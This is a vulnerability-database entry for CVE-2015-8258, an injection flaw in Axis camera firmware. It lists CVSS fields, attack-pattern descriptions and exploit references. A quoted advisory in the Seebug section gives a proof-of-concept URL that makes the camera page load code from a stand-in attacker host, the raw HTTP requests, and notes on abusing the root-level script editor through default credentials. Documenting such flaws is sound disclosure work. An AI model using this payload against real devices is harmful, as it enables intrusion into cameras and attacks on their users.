Vulnerabilities > CVE-2015-8258 - Injection vulnerability in Axis Communications Firmware
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
COMPLETE Availability impact
NONE Summary
AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Server Side Include (SSI) Injection An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
- Cross Site Scripting through Log Files An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Subverting Environment Variable Values The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
Exploit-Db
| description | AXIS Communications - Cross-Site Scripting / Content Injection. CVE-2015-8258. Webapps exploit for Hardware platform |
| file | exploits/hardware/webapps/41625.txt |
| id | EDB-ID:41625 |
| last seen | 2017-03-17 |
| modified | 2017-03-17 |
| platform | hardware |
| port | |
| published | 2017-03-17 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/41625/ |
| title | AXIS Communications - Cross-Site Scripting / Content Injection |
| type | webapps |
Packetstorm
| data source | https://packetstormsecurity.com/files/download/141672/OLSA-2015-8258.txt |
| id | PACKETSTORM:141672 |
| last seen | 2017-03-17 |
| published | 2017-03-17 |
| reporter | OrwellLabs |
| source | https://packetstormsecurity.com/files/141672/AXIS-Communications-XSS-Content-Inclusion.html |
| title | AXIS Communications XSS / Content Inclusion |
Seebug
| bulletinFamily | exploit |
| description | ### Technical Details The variable "imagePath=" (that is prone to XSS in a large range of products) also can be used to resource injection intents. If inserted a URL in this variable will be made an GET request to this URL, so this an interesting point to request malicious codes from the attacker machine, and of course, the possibilities are vast (including hook the browser). An attacker sends the following URL for the current Web user interface of the camera: ``` http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html ``` This request will be processed normally and will return the status code 200(OK): [REQUEST] ``` GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1 Host: {axisvulnhost} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX", nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb", uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html", response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth, nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs" Connection: keep-alive ``` ``` GET /evilcode.html HTTP/1.1 Host: www.3vilh0st.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0 st.com/evilcode.html Connection: keep-alive ``` The server response can be seen below (with the clipping of the affected HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"): ``` <table border="0" cellpadding="3" cellspacing="3"> <tr> <td id="videoStreamTable"> <script language="JavaScript"> <!-- video('http://www.3vilh0st.com/evilcode.html'); // --> </script> </td> </tr> </table> [..SNIP..] function listVideoSources() { var formInt = document.listFormInt; var formExt = document.listFormExt; var formCrop = document.listFormCrop; var presetForm = document.listFormPreset; var form = document.WizardForm var currentPath = 'http://www.3vilh0st.com/evilcode.html'; var imageSource; [..SNIP..] var reload = false; reload |= (other != null && other.search("seq=yes") >= 0); reload |= (other != null && other.search("streamprofile=") >= 0); reload |= ((other == null || (other != null && other.search("streamprofile= ;)(r") == -1)) && ('' != "")); reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html'); [..SNIP..] <script SRC="/incl/activeX.js?id=69"></script> </head> <body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0" marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html', '1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize=""> <script language="JavaScript"> [..SNIP..] // Draw the scale buttons var currentResolution = 0 var width = 0 var height = 0 var imagepath = "http://www.3vilh0st.com/evilcode.html" var resStart = imagepath.indexOf("resolution=") if (resStart != -1) { var resStop = imagepath.indexOf("&", resStart) [..SNIP..] =================== view.shtml snips ===================== 447 function zoom(size) 448 { 449 var url = document.URL; 450 451 if (url.indexOf("?") == -1) { 452 url += "F?size=" + size 453 } else if (url.indexOf("size=") == -1) { 454 url += "&size=" + size 455 } else { 456 var searchStr = "size=<!--#echo var="size" option="encoding:javascript" -->" 457 var replaceStr = "size=" + size 458 var re = new RegExp(searchStr , "g") 459 url = url.replace(re, replaceStr) 460 } 461 462 document.location = url; 463 } 464 465 var aNewImagePath; 466 467 function reloadPage() 468 { 469 document.location = aNewImagePath; 470 } 471 [ SNIP ] 567 aNewImagePath = '/view/view.shtml?id=<!--#echo var="ssi_request_id" option="encoding:url" -->&imagePath=' + escape(imagePath) + size; 568 if (other != null) 569 aNewImagePath += other; 570 <!--#if expr="$ptzpresets = yes" --> 571 /* append preset parameters so that preset postion is selected in drop down list after reload */ 572 if (presetName != '') 573 aNewImagePath += "&gotopresetname=" + escape(presetName); 574 else if (gotopresetname != '') 575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname); 576 577 if( newCamera != '') 578 aNewImagePath += "&camera=" + escape(newCamera); ---*--- ``` Some legitimate resources can be very interesting to cybercriminals with your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case there are some resources, like the "Open Script Editor". By this resource the user can edit any file in the operation system with root privileges, because everything (in the most part of IoT devices) runs with root privileges, this is other dangerous point to keep in mind. ``` > Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting' ``` Well, one can say that this feature is restricted to the administrator of the camera, and this would be true if customers were forced to change the default password during setup phase with a strong password policy, since change "pass" to "pass123" does not solve the problem. The aggravating factor is that there are thousands of products available on the internet, running with default credentials. ### Vendor Information, Solutions and Workarounds According to the manufacturer, the resource injection vulnerability was fixed in firmware 5.60, but we identified that the problem still occurred in 5.80.x versions of various product models. Check for updates on the manufacturer's website. About Open Script Editor,It was considered that in order to have access to this feature, it is necessary to be authenticated as an admin, but if there is no policy that forces the client to change the password during the product setup (ease vs. security) and also requires a password complexity, having an administrative credential to abuse the functionality is not exactly an impediment (e.g: botnets that bring embedded in the code a relation of default credentials for that type of device) |
| id | SSV:97252 |
| last seen | 2018-06-26 |
| modified | 2018-04-28 |
| published | 2018-04-28 |
| reporter | My Seebug |
| title | AXIS Communications - Cross-Site Scripting / Content Injection(CVE-2015-8258) |